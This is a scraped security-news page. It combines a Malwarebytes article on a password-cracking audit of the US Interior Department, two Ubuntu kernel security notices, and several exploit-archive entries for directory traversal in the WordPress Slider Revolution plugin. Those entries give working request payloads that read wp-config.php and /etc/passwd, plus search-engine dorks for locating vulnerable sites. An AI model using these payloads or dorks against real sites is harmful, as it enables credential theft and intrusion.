Categories: News
Tags: US department of the interior

Tags:  password

Tags:  hashes

Tags:  cracking

Tags:  requirements

Tags:  MFA

A recent audit cracked 21 percent of the department's passwords.



(Read more...)




The post US Department of the Interior's passwords "easily cracked" appeared first on Malwarebytes Labs.

It's bad news for the US Department of the Interior—a Government watchdog’s security audit has revealed its passwords are simply not up to the job of warding off cracking attempts.

The audit's wordy title was not kind:

> P@s$w0rds at the U.S. Department of the Interior: Easily Cracked Passwords, Lack of Multifactor Authentication, and Other Failures Put Critical DOI Systems at Risk

The audit, which used a list of “more than 1.5 billion words” and only cost around $15,000 to achieve with a dedicated cracking rig, tested the words against cryptographic hashes for the department’s active directory accounts. The words were a combination of public password lists, pop culture and government terminology, and various dictionaries written in several languages.

How well did the 86,000 or so hashes hold up? The answer is, sadly, not hugely encouraging.

**A poor show of security practices**

According to the results:

*   21 percent of the 85,944 hashes tested were cracked
*   Close to 300 accounts had elevated privileges as opposed to simply being “regular” accounts
*   362 accounts belonged to senior employees.

Perhaps more worryingly, multi-factor authentication (MFA) is not being used as widely as it could be. This may not be a surprise to regular readers. We’ve often talked about low MFA adoption rates, and this is despite large organisations like Google doing everything possible to drive people toward such setups.

25 out of 29 so-called high value assets were not protected by MFA. According to the audit, these accounts had the potential to “severely impact agency operations”.

4.75 percent of all active user accounts were based on the word “password”, and the department’s complexity requirements meant that variations of “password” combined with “1234” fulfilled the criteria despite being easy to crack.

The report makes several recommendations for better security practices, but Ars Technica notes that at least one of these is itself perhaps not the best of advice. The audit takes the Department of the Interior to task for not sticking to password changes every 60 days. Some folks insist that this practice just leads to weak password alterations. (If your staff think password1 is a decent password they'll just change it to password2 after 60 days.)

**Tackling your password problems**

If you’re worried about your organisation’s password routine, there are steps you can take to hopefully makes a lot more secure.

1.  **Multi-factor authentication (MFA)**. MFA renders password cracking almost useless, no matter how weak your password. The best form of MFA is a FIDO2 device, like a hardware key, although almost any form of MFA is better than none.
2.  **Strong passwords**. Most humans are terrible at coming up with just one strong password, and most of us need about 100 of them. Password managers solve this problem by creating and remembering strong passwords. The key part here is to ensure that the master password is also strong, and that the password manager access itself is also gated behind an additional layer of login security.
3.  **Password requirements**. If your complexity requirements sound good on paper, but allow for passwords like “p@ssw0rd123”, then you need to set about revising them. Research suggests that forcing users to make a password that passes a formula doesn't help much. It's better to simply block common passwords and have users focus on choosing long passwords rather than shorter, more complex ones.
4.  **Rate limit login attempts**. For as long as the login requires an online component of some kind, you can make life very difficult for attackers by only allowing 3 or 4 logins before shutting them down for a period of time.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

US Department of the Interior's passwords "easily cracked"

Ubuntu Security Notice 5804-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Tamas Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5804-1  
January 13, 2023

linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,  
linux-gcp-5.4, linux-hwe, linux-ibm, linux-kvm, linux-oracle,  
linux-oracle-5.4, vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems  
- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-oracle-5.4: Linux kernel for Oracle Cloud systems  
- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems  
- linux-hwe: Linux hardware enablement (HWE) kernel  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems

Details:

It was discovered that the NFSD implementation in the Linux kernel did not  
properly handle some RPC messages, leading to a buffer overflow. A remote  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-43945)

Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation  
in the Linux kernel contained multiple use-after-free vulnerabilities. A  
physically proximate attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-42896)

It was discovered that the Xen netback driver in the Linux kernel did not  
properly handle packets structured in certain ways. An attacker in a guest  
VM could possibly use this to cause a denial of service (host NIC  
availability). (CVE-2022-3643)

It was discovered that an integer overflow vulnerability existed in the  
Bluetooth subsystem in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-45934)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  linux-image-5.4.0-1042-ibm      5.4.0-1042.47  
  linux-image-5.4.0-1084-kvm      5.4.0-1084.90  
  linux-image-5.4.0-1092-oracle   5.4.0-1092.101  
  linux-image-5.4.0-1094-aws      5.4.0-1094.102  
  linux-image-5.4.0-1098-gcp      5.4.0-1098.107  
  linux-image-5.4.0-137-generic   5.4.0-137.154  
  linux-image-5.4.0-137-generic-lpae  5.4.0-137.154  
  linux-image-5.4.0-137-lowlatency  5.4.0-137.154  
  linux-image-aws-lts-20.04       5.4.0.1094.91  
  linux-image-gcp-lts-20.04       5.4.0.1098.100  
  linux-image-generic             5.4.0.137.135  
  linux-image-generic-lpae        5.4.0.137.135  
  linux-image-ibm                 5.4.0.1042.68  
  linux-image-ibm-lts-20.04       5.4.0.1042.68  
  linux-image-kvm                 5.4.0.1084.78  
  linux-image-lowlatency          5.4.0.137.135  
  linux-image-oem                 5.4.0.137.135  
  linux-image-oem-osp1            5.4.0.137.135  
  linux-image-oracle-lts-20.04    5.4.0.1092.85  
  linux-image-virtual             5.4.0.137.135

Ubuntu 18.04 LTS:  
  linux-image-4.15.0-1134-kvm     4.15.0-1134.139  
  linux-image-4.15.0-1159-azure   4.15.0-1159.174  
  linux-image-4.15.0-202-generic  4.15.0-202.213  
  linux-image-4.15.0-202-generic-lpae  4.15.0-202.213  
  linux-image-4.15.0-202-lowlatency  4.15.0-202.213  
  linux-image-5.4.0-1092-oracle   5.4.0-1092.101~18.04.1  
  linux-image-5.4.0-1098-gcp      5.4.0-1098.107~18.04.1  
  linux-image-azure-lts-18.04     4.15.0.1159.127  
  linux-image-gcp                 5.4.0.1098.74  
  linux-image-generic             4.15.0.202.185  
  linux-image-generic-lpae        4.15.0.202.185  
  linux-image-kvm                 4.15.0.1134.125  
  linux-image-lowlatency          4.15.0.202.185  
  linux-image-oracle              5.4.0.1092.101~18.04.66  
  linux-image-virtual             4.15.0.202.185

Ubuntu 16.04 ESM:  
  linux-image-4.15.0-1143-gcp     4.15.0-1143.159~16.04.1  
  linux-image-4.15.0-1148-aws-hwe  4.15.0-1148.160~16.04.1  
  linux-image-4.15.0-202-generic  4.15.0-202.213~16.04.1  
  linux-image-4.15.0-202-lowlatency  4.15.0-202.213~16.04.1  
  linux-image-aws-hwe             4.15.0.1148.133  
  linux-image-gcp                 4.15.0.1143.135  
  linux-image-generic-hwe-16.04   4.15.0.202.187  
  linux-image-gke                 4.15.0.1143.135  
  linux-image-lowlatency-hwe-16.04  4.15.0.202.187  
  linux-image-oem                 4.15.0.202.187  
  linux-image-virtual-hwe-16.04   4.15.0.202.187

Ubuntu 14.04 ESM:  
  linux-image-4.15.0-1159-azure   4.15.0-1159.174~14.04.1  
  linux-image-azure               4.15.0.1159.126

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5804-1  
  CVE-2022-3643, CVE-2022-42896, CVE-2022-43945, CVE-2022-45934

Package Information:  
  https://launchpad.net/ubuntu/+source/linux/5.4.0-137.154  
  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1094.102  
  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1098.107  
  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1042.47  
  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1084.90  
  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1092.101  
  https://launchpad.net/ubuntu/+source/linux/4.15.0-202.213  
  https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1159.174  
  https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1098.107~18.04.1  
  https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1134.139  
  https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1092.101~18.04.1

Ubuntu Security Notice USN-5804-1

Ubuntu Security Notice 5803-1 - Kyle Zeng discovered that the sysctl implementation in the Linux kernel contained a stack-based buffer overflow. A local attacker could use this to cause a denial of service or execute arbitrary code. Tamas Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5803-1January 13, 2023linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15,linux-gcp, linux-gcp-5.15, linux-hwe-5.15, linux-ibm, linux-kvm,linux-oracle, linux-raspi, vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernelDetails:Kyle Zeng discovered that the sysctl implementation in the Linux kernelcontained a stack-based buffer overflow. A local attacker could use this tocause a denial of service (system crash) or execute arbitrary code.(CVE-2022-4378)Tamás Koczka discovered that the Bluetooth L2CAP handshake implementationin the Linux kernel contained multiple use-after-free vulnerabilities. Aphysically proximate attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2022-42896)It was discovered that the Xen netback driver in the Linux kernel did notproperly handle packets structured in certain ways. An attacker in a guestVM could possibly use this to cause a denial of service (host NICavailability). (CVE-2022-3643)It was discovered that an integer overflow vulnerability existed in theBluetooth subsystem in the Linux kernel. A physically proximate attackercould use this to cause a denial of service (system crash).(CVE-2022-45934)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  linux-image-5.19.0-1015-gcp     5.19.0-1015.16  linux-image-5.19.0-1015-ibm     5.19.0-1015.16  linux-image-5.19.0-1015-oracle  5.19.0-1015.17  linux-image-5.19.0-1016-kvm     5.19.0-1016.17  linux-image-5.19.0-1017-aws     5.19.0-1017.18  linux-image-5.19.0-29-generic   5.19.0-29.30  linux-image-5.19.0-29-generic-64k  5.19.0-29.30  linux-image-5.19.0-29-generic-lpae  5.19.0-29.30  linux-image-aws                 5.19.0.1017.14  linux-image-gcp                 5.19.0.1015.12  linux-image-generic             5.19.0.29.26  linux-image-generic-64k         5.19.0.29.26  linux-image-generic-lpae        5.19.0.29.26  linux-image-ibm                 5.19.0.1015.12  linux-image-kvm                 5.19.0.1016.13  linux-image-oem-22.04           5.19.0.29.26  linux-image-oracle              5.19.0.1015.12  linux-image-virtual             5.19.0.29.26Ubuntu 22.04 LTS:  linux-image-5.15.0-1023-ibm     5.15.0-1023.26  linux-image-5.15.0-1023-raspi   5.15.0-1023.25  linux-image-5.15.0-1023-raspi-nolpae  5.15.0-1023.25  linux-image-5.15.0-1026-kvm     5.15.0-1026.31  linux-image-5.15.0-1027-gcp     5.15.0-1027.34  linux-image-5.15.0-1027-oracle  5.15.0-1027.33  linux-image-5.15.0-1028-aws     5.15.0-1028.32  linux-image-5.15.0-1031-azure   5.15.0-1031.38  linux-image-5.15.0-58-generic   5.15.0-58.64  linux-image-5.15.0-58-generic-64k  5.15.0-58.64  linux-image-5.15.0-58-generic-lpae  5.15.0-58.64  linux-image-aws                 5.15.0.1028.26  linux-image-aws-lts-22.04       5.15.0.1028.26  linux-image-azure               5.15.0.1031.27  linux-image-azure-lts-22.04     5.15.0.1031.27  linux-image-gcp                 5.15.0.1027.22  linux-image-generic             5.15.0.58.56  linux-image-generic-64k         5.15.0.58.56  linux-image-generic-64k-hwe-22.04  5.15.0.58.56  linux-image-generic-hwe-22.04   5.15.0.58.56  linux-image-generic-lpae        5.15.0.58.56  linux-image-generic-lpae-hwe-22.04  5.15.0.58.56  linux-image-ibm                 5.15.0.1023.19  linux-image-kvm                 5.15.0.1026.22  linux-image-oem-20.04           5.15.0.58.56  linux-image-oracle              5.15.0.1027.22  linux-image-raspi               5.15.0.1023.20  linux-image-raspi-nolpae        5.15.0.1023.20  linux-image-virtual             5.15.0.58.56  linux-image-virtual-hwe-22.04   5.15.0.58.56Ubuntu 20.04 LTS:  linux-image-5.15.0-1027-gcp     5.15.0-1027.34~20.04.1  linux-image-5.15.0-1028-aws     5.15.0-1028.32~20.04.1  linux-image-5.15.0-1031-azure   5.15.0-1031.38~20.04.1  linux-image-5.15.0-58-generic   5.15.0-58.64~20.04.1  linux-image-5.15.0-58-generic-64k  5.15.0-58.64~20.04.1  linux-image-5.15.0-58-generic-lpae  5.15.0-58.64~20.04.1  linux-image-aws                 5.15.0.1028.32~20.04.17  linux-image-azure               5.15.0.1031.38~20.04.21  linux-image-gcp                 5.15.0.1027.34~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.58.64~20.04.24  linux-image-generic-hwe-20.04   5.15.0.58.64~20.04.24  linux-image-generic-lpae-hwe-20.04  5.15.0.58.64~20.04.24  linux-image-virtual-hwe-20.04   5.15.0.58.64~20.04.24After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-5803-1  CVE-2022-3643, CVE-2022-42896, CVE-2022-4378, CVE-2022-45934Package Information:  https://launchpad.net/ubuntu/+source/linux/5.19.0-29.30  https://launchpad.net/ubuntu/+source/linux-aws/5.19.0-1017.18  https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1015.16  https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1015.16  https://launchpad.net/ubuntu/+source/linux-kvm/5.19.0-1016.17  https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1015.17  https://launchpad.net/ubuntu/+source/linux/5.15.0-58.64  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1028.32  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1031.38  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1027.34  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1023.26  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1026.31  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1027.33  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1023.25  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1028.32~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1031.38~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1027.34~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-58.64~20.04.1

Ubuntu Security Notice USN-5803-1

WebKit suffers from a RenderMathMLToken use-after-free vulnerability in CSSCrossfadeValue::crossfadeChanged.

WebKit CSSCrossfadeValue::crossfadeChanged Use-After-Free

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.9.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | b974aee33a66e29925be0ab29843b305b114f9a63e635ad75ca2c10d50af3474

Download | Favorite | View

**WordPress Slider Revolution 4.9.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.9.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/comunicacioninternacomuy/sitio/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.9.2 Directory Traversal

WordPress Slider Revolution plugin version 4.6.5 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.6.5 UpdateCaptionsCSS Directory Traversal Vulnerability                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/27513804                                  |  | # Dork      : revslider.php "index of"                                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Directory Traversal

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.3 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 83b023ff748b63a814933d6674398e32e4fb2ba5c520cc7997e01b2a23da875c

Download | Favorite | View

**WordPress Slider Revolution 4.1.3 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.3 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/sse.sg/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.3 Directory Traversal

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108

Download | Favorite | View

**WordPress Slider Revolution 4.1.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.2 Directory Traversal

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 3.0.8 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53

Download | Favorite | View

**WordPress Slider Revolution 3.0.8 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
